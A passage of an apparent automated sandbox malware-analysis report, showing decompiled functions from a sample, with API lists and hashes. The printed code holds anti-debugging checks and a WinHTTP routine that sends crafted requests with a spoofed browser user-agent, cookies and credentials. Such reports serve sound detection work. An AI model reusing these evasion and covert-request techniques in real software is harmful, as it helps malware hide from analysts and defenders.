				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000001;
			}






                                                                                                                                                                  0x10019f66
                                                                                                                                                                  0x10019f78
                                                                                                                                                                  0x10019f8a
                                                                                                                                                                  0x10019f9e
                                                                                                                                                                  0x10019fad

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F72
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F84
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F97
                                                                                                                                                                  • NtQueryInformationProcess.NTDLL(00000000), ref: 10019F9E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                                  • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                  • API String ID: 3653371871-801751246
                                                                                                                                                                  • Opcode ID: dc2663662de57aa8d86a3c57fad3ddc80e3676cde8346b3d07215fab81a3fbda
                                                                                                                                                                  • Instruction ID: d88cad77f1889e8aed178f934c13fc5a1fcc4ce016c014487da4b3248a857db2
                                                                                                                                                                  • Opcode Fuzzy Hash: dc2663662de57aa8d86a3c57fad3ddc80e3676cde8346b3d07215fab81a3fbda
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FF01C75900208FBEB00DBE08D8DA9CBB78EB04301F514094FB11A6140DA751A48CB55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019FB0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019FB0() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                                  0x10019fb6
                                                                                                                                                                  0x10019fc8
                                                                                                                                                                  0x10019fda
                                                                                                                                                                  0x10019fee
                                                                                                                                                                  0x10019ffd

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FC2
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FD4
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019FE7
                                                                                                                                                                  • NtQueryInformationProcess.NTDLL(00000000), ref: 10019FEE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                                  • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                  • API String ID: 3653371871-801751246
                                                                                                                                                                  • Opcode ID: 97d65c81b8affce13ccd6c9ce68ef998821de5ec64206124f7a57a839e50d98e
                                                                                                                                                                  • Instruction ID: aa9a5b676a7025e0056a7a55a28efeedef31c6b5470972081c5102af1e44dd82
                                                                                                                                                                  • Opcode Fuzzy Hash: 97d65c81b8affce13ccd6c9ce68ef998821de5ec64206124f7a57a839e50d98e
                                                                                                                                                                  • Instruction Fuzzy Hash: 35F01C75900208FBEB009BE0CD4DBDCBBB8EB04301F514094EA11A6180DA741A48CB55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019DA0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 20librarythreadnativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019DA0() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				return NtSetInformationThread(GetCurrentThread(), 0x11, 0, 0);
			}





                                                                                                                                                                  0x10019db1
                                                                                                                                                                  0x10019dc3
                                                                                                                                                                  0x10019dd9

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Ntdll.dll,?,100207E1), ref: 10019DAB
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019DBD
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 10019DCC
                                                                                                                                                                  • NtSetInformationThread.NTDLL(00000000,?,100207E1), ref: 10019DD3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AddressCurrentInformationLibraryLoadProc
                                                                                                                                                                  • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                                  • API String ID: 1707985920-1680533912
                                                                                                                                                                  • Opcode ID: 81fb8b46b22517918d6ec40a5a4b5af2fd6c90d3156655230c1d6776d8c37ca9
                                                                                                                                                                  • Instruction ID: ec36d98e740d09ce498d664616d1e94f1a85ab36ce5175e8c059281a5b49cb64
                                                                                                                                                                  • Opcode Fuzzy Hash: 81fb8b46b22517918d6ec40a5a4b5af2fd6c90d3156655230c1d6776d8c37ca9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7FE0E674944208FBEF009BE09D8DB9CBB78EB04702FA14051FF05A6280DA715A454AA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A1D0, Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A1D0(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				intOrPtr _v328;
				void* _v332;
				void* _t11;

				_v328 = 0;
				_t11 = FindFirstFileA(_a4,  &_v324); // executed
				_v332 = _t11;
				if(_v332 != 0xffffffff) {
					_v328 = _v324.nFileSizeLow;
				}
				FindClose(_v332); // executed
				return _v328;
			}







                                                                                                                                                                  0x1001a1d9
                                                                                                                                                                  0x1001a1ee
                                                                                                                                                                  0x1001a1f4
                                                                                                                                                                  0x1001a201
                                                                                                                                                                  0x1001a209
                                                                                                                                                                  0x1001a209
                                                                                                                                                                  0x1001a216
                                                                                                                                                                  0x1001a225

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileA.KERNELBASE(1001A6D9,?), ref: 1001A1EE
                                                                                                                                                                  • FindClose.KERNELBASE(000000FF), ref: 1001A216
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  • Opcode ID: 286baa16cd583546fe3035f76e659778872b80ee5ac4cf2322355d765b363de7
                                                                                                                                                                  • Instruction ID: d31bde6dcc0951e355ad99ae7a1c5ee3f3ec40d99bb51e99ff820f39f399f313
                                                                                                                                                                  • Opcode Fuzzy Hash: 286baa16cd583546fe3035f76e659778872b80ee5ac4cf2322355d765b363de7
                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0A57590022C9BDB70DF64DD88BDDB7B8AB08310F1002D4E91DA32A0DB30AAD58F51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A050, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E1001A050(void* __ecx) {
				char _v8;

				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx); // executed
				return _v8;
			}




                                                                                                                                                                  0x1001a05f
                                                                                                                                                                  0x1001a06b

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000001,?,?,1001A092,?,?,1001A120), ref: 1001A058
                                                                                                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?,?,1001A092,?,?,1001A120), ref: 1001A05F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CheckCurrentDebuggerPresentProcessRemote
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3244773808-0
                                                                                                                                                                  • Opcode ID: 71cd54979e637eef40f12cd3ff344a400265874cd4a543beada5d783fbf83a72
                                                                                                                                                                  • Instruction ID: 7aa664103940c8ed1930ed56626e242170840db10b01f7fadc3ab8fab0425f62
                                                                                                                                                                  • Opcode Fuzzy Hash: 71cd54979e637eef40f12cd3ff344a400265874cd4a543beada5d783fbf83a72
                                                                                                                                                                  • Instruction Fuzzy Hash: CAC0127680020CA7CB00DBE0CD88889777CD6041117110181FA09C3200D9319A444654
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00428721, Relevance: 1.7, APIs: 1, Instructions: 224COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d4521ca4c48a0d8f58af42058b07f995c55cd53f70bebeb77ae466ccb6da723f
                                                                                                                                                                  • Instruction ID: 456a23d05ecfa93df3654df44f4e7bbebce0a5fee06967f3f6b3dea59869f52f
                                                                                                                                                                  • Opcode Fuzzy Hash: d4521ca4c48a0d8f58af42058b07f995c55cd53f70bebeb77ae466ccb6da723f
                                                                                                                                                                  • Instruction Fuzzy Hash: 9181E8323061634ADB198B29D87017FFBB0AFA1361F5A479ED8B2CB2C4EF389554C614
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00426B8B, Relevance: .3, Instructions: 325COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c8dbfc6b4b673a5f246bec93b358ad898170d522aa83960814c93540441aacad
                                                                                                                                                                  • Instruction ID: 0664da2568eaf7254b5366e9b18a30918e00ae55e4054ac11544ea2139546350
                                                                                                                                                                  • Opcode Fuzzy Hash: c8dbfc6b4b673a5f246bec93b358ad898170d522aa83960814c93540441aacad
                                                                                                                                                                  • Instruction Fuzzy Hash: C591A23A700654DFEB12CEA9D5C0765B792EB4EB68F35407AE907C7312E6BA9C00D640
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10021C30, Relevance: 100.4, APIs: 42, Strings: 15, Instructions: 641timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                                                  			E10021C30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, signed int _a24, long _a28, long _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v40;
				long _v44;
				WCHAR* _v48;
				long _v52;
				short _v54;
				short _v58;
				short _v62;
				short _v66;
				short _v70;
				char _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				long _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				long _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				signed int _v140;
				char _v28334;
				char _v28336;
				intOrPtr _v28340;
				intOrPtr _v28344;
				char _v28862;
				short _v28864;
				long _v28868;
				long _v28872;
				long _v28876;
				intOrPtr _v28880;
				intOrPtr _v28884;
				char _v28912;
				char _v28940;
				long _v28944;
				intOrPtr _v28948;
				intOrPtr _v28952;
				intOrPtr _v28956;
				long _v28960;
				intOrPtr _v28964;
				intOrPtr _v28968;
				intOrPtr _v28972;
				intOrPtr _v28976;
				void* __ebp;
				long _t263;
				intOrPtr _t267;
				long _t268;
				signed int* _t276;
				long _t277;
				long _t279;
				long _t288;
				long _t292;
				long _t295;
				long _t298;
				long _t311;
				intOrPtr _t330;
				intOrPtr _t470;
				void* _t471;
				void* _t473;
				void* _t479;

				_t469 = __esi;
				_t468 = __edi;
				_t357 = __ebx;
				_push(0xffffffff);
				_push(E10023295);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t470;
				E10018B00(0x7120);
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				_v28 = 0;
				_v20 = 0x50;
				_v40 = 0;
				_t263 = E100212F0(__ebx, __edi, __esi, _a16,  &_v24,  &_v36,  &_v28,  &_v20,  &_v40);
				_t471 = _t470 + 0x18;
				_v32 = _t263;
				if(_v32 == 0) {
					L66:
					 *[fs:0x0] = _v16;
					return _v32;
				} else {
					_v32 = 0;
					_v48 = "----WebKitFormBoundaryovEAlxca0DiIz7tl";
					_v76 = E1001A3D0(__ebx, __edi, __esi, _v28);
					_t267 = E1001A3D0(__ebx, __edi, __esi, _v40);
					_t473 = _t471 + 8;
					_v84 = _t267;
					_v72 = 0;
					_v70 = 0;
					_v66 = 0;
					_v62 = 0;
					_v58 = 0;
					_v54 = 0;
					_t268 = _a20;
					_v28944 = _t268;
					if(_v28944 == 1) {
						_t268 = E1000E7A3(0,  &_v72, 0xa, L"GET");
						_t473 = _t473 + 0xc;
					} else {
						if(_v28944 > 1) {
							if(_v28944 <= 3) {
								_t268 = E1000E7A3( &_v72,  &_v72, 0xa, L"POST");
								_t473 = _t473 + 0xc;
							}
						}
					}
					_v88 = 0;
					_v44 = 0;
					_v80 = 0;
					_v52 = 0;
					__imp__WinHttpOpen(L"A WinHTTP Example Program/1.0", 0, 0, 0, 0); // executed
					_v44 = _t268;
					if(_v44 == 0) {
						L59:
						__eflags = _v52;
						if(_v52 != 0) {
							__imp__WinHttpCloseHandle(_v52);
						}
						__eflags = _v80;
						if(_v80 != 0) {
							__imp__WinHttpCloseHandle(_v80);
						}
						__eflags = _v44;
						if(__eflags != 0) {
							__imp__WinHttpCloseHandle(_v44);
						}
						_push(_v84);
						E1000CA40(_t357, _t468, _t469, __eflags);
						_push(_v76);
						E1000CA40(_t357, _t468, _t469, __eflags);
						_push(_v36);
						E1000CA40(_t357, _t468, _t469, __eflags);
						_push(_v28);
						E1000CA40(_t357, _t468, _t469, __eflags);
						_push(_v40);
						E1000CA40(_t357, _t468, _t469, __eflags);
						goto L66;
					}
					_t504 = _a4;
					if(_a4 != 0) {
						_v100 = E1001A3D0(_t357, _t468, _t469, _a4);
						_v112 = 3;
						_v108 = _v100;
						_v104 = 0x10025f9c;
						__imp__WinHttpSetOption(_v44, 0x26,  &_v112, 0xc);
						_push(_v100);
						E1000CA40(_t357, _t468, _t469, _t504);
						_t473 = _t473 + 8;
					}
					asm("sbb edx, edx");
					_v92 =  ~_a24 & 0x00000002;
					_t276 =  &_v92;
					__imp__WinHttpSetOption(_v44, 0x58, _t276, 4);
					_v96 = _t276;
					_t277 = _v76;
					__imp__WinHttpConnect(_v44, _t277, _v20, 0);
					_v80 = _t277;
					if(_v80 == 0) {
						goto L59;
					}
					_v116 = 0x100;
					if(_v24 != 0) {
						_v116 = _v116 | 0x00800000;
					}
					_t279 = _v80;
					__imp__WinHttpOpenRequest(_t279,  &_v72, _v84, L"HTTP/1.1", 0, 0, _v116); // executed
					_v52 = _t279;
					if(_v52 == 0) {
						goto L59;
					} else {
						if(_a8 != 0) {
							_t510 = _a12;
							if(_a12 != 0) {
								_v132 = E1001A3D0(_t357, _t468, _t469, _a8);
								_v136 = E1001A3D0(_t357, _t468, _t469, _a12);
								__imp__WinHttpSetCredentials(_v52, 1, 1, _v132, _v136, 0);
								_push(_v132);
								E1000CA40(_t357, _t468, _t469, _t510);
								_push(_v136);
								E1000CA40(_t357, _t468, _t469, _t510);
								_t473 = _t473 + 0x10;
							}
						}
						_v120 = 4;
						__imp__WinHttpQueryOption(_v52, 0x1f,  &_v116,  &_v120);
						_v116 = _v116 | 0x00000100;
						_v116 = _v116 | 0x00002000;
						_v116 = _v116 | 0x00001000;
						__imp__WinHttpSetOption(_v52, 0x1f,  &_v116, 4);
						__imp__WinHttpAddRequestHeaders(_v52, L"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"upgrade-insecure-requests: 1", 0xffffffff, 0xa0000000);
						if(_a60 == 0) {
							L22:
							__eflags = _a28;
							if(_a28 != 0) {
								_v28340 = E1001A3D0(_t357, _t468, _t469, _a28);
								_v28336 = 0;
								E1000CF80(_t468,  &_v28334, 0, 0x6e1e);
								E1000E7A3( &_v28336,  &_v28336, 0x3710, L"Cookie: ");
								E1000E729( &_v28336, 0x3710, _v28340);
								__imp__WinHttpAddRequestHeaders(_v52,  &_v28336, 0xffffffff, 0xa0000000);
								_push(_v28340);
								E1000CA40(_t357, _t468, _t469, __eflags);
								_t473 = _t473 + 0x2c;
							}
							_v28948 = _a20;
							__eflags = _v28948 - 2;
							if(_v28948 == 2) {
								__imp__WinHttpAddRequestHeaders(_v52, L"Content-Type: application/x-www-form-urlencoded", 0xffffffff, 0xa0000000);
							} else {
								__eflags = _v28948 - 3;
								if(_v28948 == 3) {
									_v28864 = 0;
									E1000CF80(_t468,  &_v28862, 0, 0x206);
									_v28344 = E1001A3D0(_t357, _t468, _t469, _v48);
									wsprintfW( &_v28864, L"Content-Type: multipart/form-data; boundary=%ws", _v28344);
									__imp__WinHttpAddRequestHeaders(_v52,  &_v28864, 0xffffffff, 0xa0000000);
									_push(_v28344);
									E1000CA40(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 0x20;
								}
							}
							__imp__WinHttpSetTimeouts(_v52, 0xc350, 0xc350, 0xc350, 0xc350);
							_v128 = 0;
							_v124 = 0;
							__eflags = _a20 - 3;
							if(_a20 == 3) {
								_v124 = E100215A0(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
								_v128 = L1000CEAF(_t357, _v48, _t468, _t469, _v124);
								E1000CF80(_t468, _v128, 0, _v124);
								_t330 = E100215A0(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
								_t473 = _t473 + 0x58;
								_v124 = _t330;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28952 = _a36;
							} else {
								_v28952 = _v124;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28956 = _a36;
							} else {
								_v28956 = _v124;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28960 = _a32;
							} else {
								_v28960 = _v128;
							}
							_t288 = _v52;
							__imp__WinHttpSendRequest(_t288, 0, 0, _v28960, _v28956, _v28952, 0); // executed
							_v88 = _t288;
							__eflags = _v88;
							if(_v88 == 0) {
								L57:
								__eflags = _v128;
								if(__eflags != 0) {
									_push(_v128);
									E1000CA40(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 4;
								}
								goto L59;
							} else {
								__imp__WinHttpReceiveResponse(_v52, 0);
								_v88 = _t288;
								__eflags = _v88;
								if(_v88 == 0) {
									goto L57;
								}
								_v28868 = 0;
								__imp__WinHttpQueryHeaders(_v52, 0x16, 0, 0,  &_v28868, 0);
								_t292 = GetLastError();
								__eflags = _t292 - 0x7a;
								if(_t292 == 0x7a) {
									_v28884 = L1000CEAF(_t357,  &_v28868, _t468, _t469, _v28868 + 2);
									__eflags = _v28868 + 2;
									E1000CF80(_t468, _v28884, 0, _v28868 + 2);
									_t311 = _v52;
									__imp__WinHttpQueryHeaders(_t311, 0x16, 0, _v28884,  &_v28868, 0);
									_v88 = _t311;
									_v28880 = E1001A460(_t357, _t468, _t469, _v28884);
									_v28964 = E10001160( &_v28912, __eflags, _v28880);
									_v28968 = _v28964;
									_v8 = 0;
									E10001A90(_a64, _v28968);
									_v8 = 0xffffffff;
									E100011A0( &_v28912);
									_push(_v28880);
									E1000CA40(_t357, _t468, _t469, __eflags);
									_push(_v28884);
									_t292 = E1000CA40(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 0x1c;
								}
								_v28876 = 0;
								_v28872 = 0;
								__eflags = _v88;
								if(_v88 == 0) {
									L56:
									_v32 = _v88;
									goto L57;
								} else {
									while(1) {
										_v28868 = 0;
										_t437 = _v52;
										__imp__WinHttpQueryDataAvailable(_v52,  &_v28868); // executed
										__eflags = _t292;
										if(__eflags == 0) {
											break;
										}
										__eflags = _v28868;
										if(_v28868 != 0) {
											_t295 = L1000CEAF(_t357, _t437, _t468, _t469, _v28868 + 1);
											_t479 = _t473 + 4;
											_v28876 = _t295;
											__eflags = _v28876;
											if(__eflags != 0) {
												E1000CF80(_t468, _v28876, 0, _v28868 + 1);
												_t473 = _t479 + 0xc;
												_t439 = _v28876;
												_t298 = _v52;
												__imp__WinHttpReadData(_t298, _v28876, _v28868,  &_v28872);
												__eflags = _t298;
												if(__eflags == 0) {
													_push(GetLastError());
													_push("WinHttpQueryDataAvailable failed. Error = %d\n");
													E1000E664(_t357, _t439, _t468, _t469, __eflags);
													_t473 = _t473 + 8;
												}
												__eflags = _v28872;
												if(__eflags != 0) {
													_v28972 = E10001160( &_v28940, __eflags, _v28876);
													_v28976 = _v28972;
													_v8 = 1;
													E10001A90(_a68, _v28976);
													_v8 = 0xffffffff;
													E100011A0( &_v28940);
													_push(_v28876);
													_t292 = E1000CA40(_t357, _t468, _t469, __eflags);
													_t473 = _t473 + 4;
													__eflags = _v28868;
													if(_v28868 > 0) {
														continue;
													}
												} else {
												}
												goto L56;
											}
											_push("Out of memory.\n");
											E1000E664(_t357, _t437, _t468, _t469, __eflags);
											_t473 = _t479 + 4;
											goto L56;
										}
										goto L56;
									}
									_push(GetLastError());
									_push("WinHttpQueryDataAvailable failed. Error = %d\n");
									E1000E664(_t357, _t437, _t468, _t469, __eflags);
									_t473 = _t473 + 8;
									goto L56;
								}
							}
						} else {
							_v140 = 0;
							while( *((intOrPtr*)(_a60 + _v140 * 4)) != 0) {
								__imp__WinHttpAddRequestHeaders(_v52,  *((intOrPtr*)(_a60 + _v140 * 4)), 0xffffffff, 0xa0000000);
								_v140 = _v140 + 1;
							}
							goto L22;
						}
					}
				}
			}












































































                                                                                                                                                                  0x10021c30
                                                                                                                                                                  0x10021c30
                                                                                                                                                                  0x10021c30
                                                                                                                                                                  0x10021c33
                                                                                                                                                                  0x10021c35
                                                                                                                                                                  0x10021c40
                                                                                                                                                                  0x10021c41
                                                                                                                                                                  0x10021c4d
                                                                                                                                                                  0x10021c52
                                                                                                                                                                  0x10021c59
                                                                                                                                                                  0x10021c60
                                                                                                                                                                  0x10021c67
                                                                                                                                                                  0x10021c6e
                                                                                                                                                                  0x10021c75
                                                                                                                                                                  0x10021c94
                                                                                                                                                                  0x10021c99
                                                                                                                                                                  0x10021c9c
                                                                                                                                                                  0x10021ca3
                                                                                                                                                                  0x10022513
                                                                                                                                                                  0x10022519
                                                                                                                                                                  0x10022523
                                                                                                                                                                  0x10021ca9
                                                                                                                                                                  0x10021ca9
                                                                                                                                                                  0x10021cb0
                                                                                                                                                                  0x10021cc3
                                                                                                                                                                  0x10021cca
                                                                                                                                                                  0x10021ccf
                                                                                                                                                                  0x10021cd2
                                                                                                                                                                  0x10021cd5
                                                                                                                                                                  0x10021cdd
                                                                                                                                                                  0x10021ce0
                                                                                                                                                                  0x10021ce3
                                                                                                                                                                  0x10021ce6
                                                                                                                                                                  0x10021ce9
                                                                                                                                                                  0x10021ced
                                                                                                                                                                  0x10021cf0
                                                                                                                                                                  0x10021cfd
                                                                                                                                                                  0x10021d1e
                                                                                                                                                                  0x10021d23
                                                                                                                                                                  0x10021cff
